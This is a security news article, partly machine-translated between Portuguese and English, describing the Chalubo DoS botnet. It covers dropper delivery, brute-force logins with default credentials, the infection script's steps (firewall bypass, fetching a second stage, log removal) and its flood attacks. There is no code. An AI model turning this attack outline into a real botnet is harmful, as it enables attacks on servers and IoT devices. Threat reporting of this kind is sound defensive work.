Casa > cibernético Notícias > Newly Discovered Chalubo Botnet Used as a DoS Weapon

Recém-descoberto Chalubo Botnet usado como uma arma DoS

O botnet Chalubo é um malware descoberto recentemente que tem sido encontrado para conter recursos avançados de outras ameaças ea ser usada para DoS (negação de serviço) campanhas de ataque. No momento em que vários ataques foram avistados. Our article gives an overview of how the malware -functions.

The Chalubo Botnet Is a Formidable DoS Weapon

A new dangerous malware called the Chalubo botnet has been discovered by a team of security researchers. Several iterations of it have been found to cause infections. The first versions that are linked to it were observed back in August where three malicious components were used in an attack against x86 machines. This is attributed to be an early test attack which is probably a way for the operators to fine tune and tweak the botnet.

o Elknot dropper was later used to deliver a more complete version of the malware. The captured samples indicate that there are several variants of it available — there are specialist versions for each architecture. This makes it very effective against both servers and IoT devices.

Story relacionado: [wplinkpreview url =””]Nova campanha maliciosa foge da detecção de AV, Spyware para downloads

In September a shift in the infection tactics was observed. Instead of the dropper the malicious component depended on ataques de força bruta against remote desktop services. The hackers loaded the infection script with the default credentials and often used username and password combinations. Updated versions of the Chalubo botnet featured advanced anti-analysis code that protected them from being discovered by both administrators and security software. This is done by launching a hardcoded script that executes the following operations:

  1. Firewall Bypass
  2. Installation of the “wget” download utility if it is not present.
  3. Downloading of a second-stage script
  4. Modificação do sistema
  5. Log Files Removal

What follows is the actual bot deployment. When started it will connect to a specific hacker-controlled server and report of the successful infection. The observed hacker instructions was to download other modules depending on the individual machine configuration. So far it seems that the Chalubo botnet is used to perform all basic DoS attacks — DNS, UDP and SYN floods against a given target. We anticipate that the attacks and further upgrades to its code base will continue. As the botnet is based on scripts and publicly available source code there is the possibility that it will be sold or traded on the underground hacker marketplaces. As such offspring versions can include more dangerous modules.

Martin Beltov

Martin formou-se na publicação da Universidade de Sofia. Como a segurança cibernética entusiasta ele gosta de escrever sobre as ameaças mais recentes e mecanismos de invasão.

mais Posts

Me siga:

Deixe um comentário

seu endereço de e-mail não será publicado. Campos obrigatórios são marcados *

Compartilhar no Facebook Compartilhar
Compartilhar no Twitter chilrear
Compartilhar no Google Plus Compartilhar
Partilhar no Linkedin Compartilhar
Compartilhar no Digg Compartilhar
Compartilhar no Reddit Compartilhar
Partilhar no StumbleUpon Compartilhar